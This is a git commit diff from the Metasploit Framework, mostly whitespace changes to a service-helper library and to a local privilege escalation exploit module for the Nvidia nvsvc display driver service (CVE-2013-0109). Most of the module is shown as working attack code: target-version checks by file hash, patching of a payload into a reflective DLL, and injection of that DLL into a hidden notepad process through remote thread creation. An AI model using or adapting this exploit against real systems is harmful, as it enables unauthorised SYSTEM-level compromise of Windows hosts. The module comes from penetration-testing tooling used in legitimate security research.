Conflicts:
	lib/msf/core/post/windows/services.rb
bug/bundler_fix
Meatballs 2013-07-05 22:35:22 +01:00
parent 5eca4714c2
commit 819ba30a33
2 changed files with 53 additions and 53 deletions


@ -292,7 +292,7 @@ module Services
# Now to grab a handle to the service. # Now to grab a handle to the service.
# Thank you, Wine project for defining the DELETE constant since it, # Thank you, Wine project for defining the DELETE constant since it,
# and all its friends, are missing from the MSDN docs. # and all its friends, are missing from the MSDN docs.
# #define DELETE 0x00010000 # #define DELETE 0x00010000
handle = adv.OpenServiceA(manager, name, 0x10000) handle = adv.OpenServiceA(manager, name, 0x10000)
if (handle["return"] == 0) if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}") raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@ -312,7 +312,7 @@ module Services
# #
# @param (see #service_start) # @param (see #service_start)
# #
# @return {} representing lpServiceStatus # @return {} representing lpServiceStatus
# #
# @raise (see #service_start) # @raise (see #service_start)
# #


@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
def initialize(info={}) def initialize(info={})
super(update_info(info, { super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation', 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{ 'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can
interact with the service. The service has a stacked based buffer overflow as a result interact with the service. The service has a stacked based buffer overflow as a result
of a memmove operation. of a memmove operation.
N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr!
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012. It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Peter Wintersmith', # Original exploit 'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
], ],
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'Platform' => 'win', 'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ], 'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ] [ 'Automatic', { } ]
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 2048, 'Space' => 2048,
'DisableNops' => true 'DisableNops' => true
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2013-0109' ], [ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ], [ 'OSVDB', '88745' ],
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
rescue RuntimeError => e rescue RuntimeError => e
print_error("Unable to retrieve service status") print_error("Unable to retrieve service status")
end end
if sysinfo['Architecture'] =~ /WOW64/i if sysinfo['Architecture'] =~ /WOW64/i
# Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!) # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
else else
path = svc['Command'].strip path = svc['Command'].strip
end end
begin begin
hash = client.fs.file.md5(path).unpack('H*').first hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
if vuln_hashes.include?(hash) if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable") vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
vprint_status("Hash '#{hash}' is not recorded as vulnerable") vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected return Exploit::CheckCode::Detected
end end
@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
end end
end end
def create_proc def create_proc
windir = expand_path("%windir%") windir = expand_path("%windir%")
cmd = "#{windir}\\system32\\notepad.exe" cmd = "#{windir}\\system32\\notepad.exe"
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
end end
def is_running? def is_running?
begin begin
status = service_status('nvsvc') status = service_status('nvsvc')
return (status and status[:state] == 4) return (status and status[:state] == 4)
rescue RuntimeError => e rescue RuntimeError => e
print_error("Unable to retrieve service status") print_error("Unable to retrieve service status")
return false return false
end end
end end
@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
else else
print_good("Service is running") print_good("Service is running")
end end
dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
pay = payload.encoded dll = ''
offset = nil
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
bo = dll.index('PAYLOAD:') pay = payload.encoded
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) bo = dll.index('PAYLOAD:')
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
dll[bo, pay.length] = [pay].pack("a*")
pe.exports.entries.each do |entry| pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
print_error("No offset found") unless offset pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
new_pid = create_proc print_error("No offset found") unless offset
if not new_pid new_pid = create_proc
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
end
vprint_status("Injecting payload into memory") if not new_pid
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS) fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
mem = host_process.memory.allocate(dll.length + (dll.length % 1024)) end
host_process.memory.protect(mem)
host_process.memory.write(mem, dll) vprint_status("Injecting payload into memory")
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
host_process.memory.protect(mem)
host_process.memory.write(mem, dll)
print_status("Executing exploit...") print_status("Executing exploit...")
host_process.thread.create(mem+offset) host_process.thread.create(mem+offset)
end end